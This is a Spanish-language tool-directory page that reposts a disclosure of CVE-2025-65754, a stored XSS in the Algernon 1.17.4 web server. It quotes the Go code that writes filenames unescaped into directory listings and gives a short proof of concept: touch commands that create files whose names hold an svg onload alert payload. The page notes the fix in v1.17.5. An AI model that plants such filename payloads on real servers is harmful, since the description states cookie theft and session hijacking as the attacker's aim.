Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-65754 — Algernon v1.17.4 está afectado por una vulnerabilidad de Cross-Site Scripting (XSS) que permite a los atacantes ejecutar código arbitrario mediante un payload manipulado en un nombre de archivo. | Kitploit
Herramientas/GitHubGitHub/bnyt7/cve-2025-65754
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubbnyt7/cve-2025-65754

CVE-2025-65754

Algernon v1.17.4 está afectado por una vulnerabilidad de Cross-Site Scripting (XSS) que permite a los atacantes ejecutar código arbitrario mediante un payload manipulado en un nombre de archivo.

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-65754: XSS almacenado en Algernon 1.17.4

Descripción

Algernon v1.17.4 está afectado por una vulnerabilidad de Cross-Site Scripting (XSS) que permite a los atacantes ejecutar código arbitrario mediante un payload manipulado en un nombre de archivo.

  • Proyecto afectado: Algernon - 1.17.4
  • Mantenedor del proyecto: Alexander F. Rødseth (xyproto)
  • Tipo de vulnerabilidad: Cross-Site Scripting (XSS)
  • Vector de ataque: Un atacante podría subir archivos con nombres maliciosos para cambiar el contenido de un sitio web o robar cookies para secuestrar sesiones.

Algunas variables no fueron sanitizadas.

Por ejemplo:

engine/dirhandler.go líneas 80-108

root@kitploit:~
filename := item.Name()  // Get filename from filesystem
// ...
buf.WriteString(themes.HTMLLink(filename, URLpath, ac.fs.IsDir(fullFilename)))

themes/html.go líneas 124-132

root@kitploit:~
func HTMLLink(text, url string, isDirectory bool) string {
    if isDirectory {
        text += "/"
        url += "/"
    }
    return "<a href=\"/" + url + "\">" + text + "</a><br>"
    // 'text' (filename) is inserted directly without HTML escaping
}

Los nombres de archivo del sistema de archivos se insertan directamente en HTML sin escape en los listados de directorios.

PoC

root@kitploit:~
$ algernon -v                                  
Algernon 1.17.4

En un directorio, cree archivos con payloads XSS como nombres.

root@kitploit:~
# XSS Payload 1: Simple alert
$touch "test.txt"

# XSS Payload 2: Event handler in filename
$touch "document<svg onload=alert(document.domain)>.svg"

En el mismo repositorio, ejecute la aplicación.

root@kitploit:~
algernon
root@kitploit:~
Server directory:       .
Server address:         :3000
Database:               Bolt (/tmp/algernon.db)
Cache mode:             On
Cache size:             1048576 bytes
TLS certificate:        cert.pem
TLS key:                key.pem
Request limit:          10/sec per visitor
Large file threshold:   44040192 bytes
Large file timeout:     10 sec
INFO[0000] Serving HTTP/2 on https://localhost:3000/    
ERRO[0000] open cert.pem: no such file or directory. Not serving HTTP/2. 
INFO[0000] Use the -t flag for serving regular HTTP.    
INFO[0000] Serving HTTP on http://localhost:3000/      

Visite la siguiente URL, aparecerá una alerta.

Alerta XSS con onerror

Alerta XSS con document.location

archivos

Este problema ha sido corregido en la versión v1.17.5.

Referencias

  • https://algernon.roboticoverlords.org/
  • https://github.com/xyproto/algernon/releases/tag/v1.17.5
  • https://github.com/xyproto/algernon/commit/cd8832014a624a9aeab60566434c3344135e23f8

Descubridor: Benoit H. (Bnyt7)

Descargar herramienta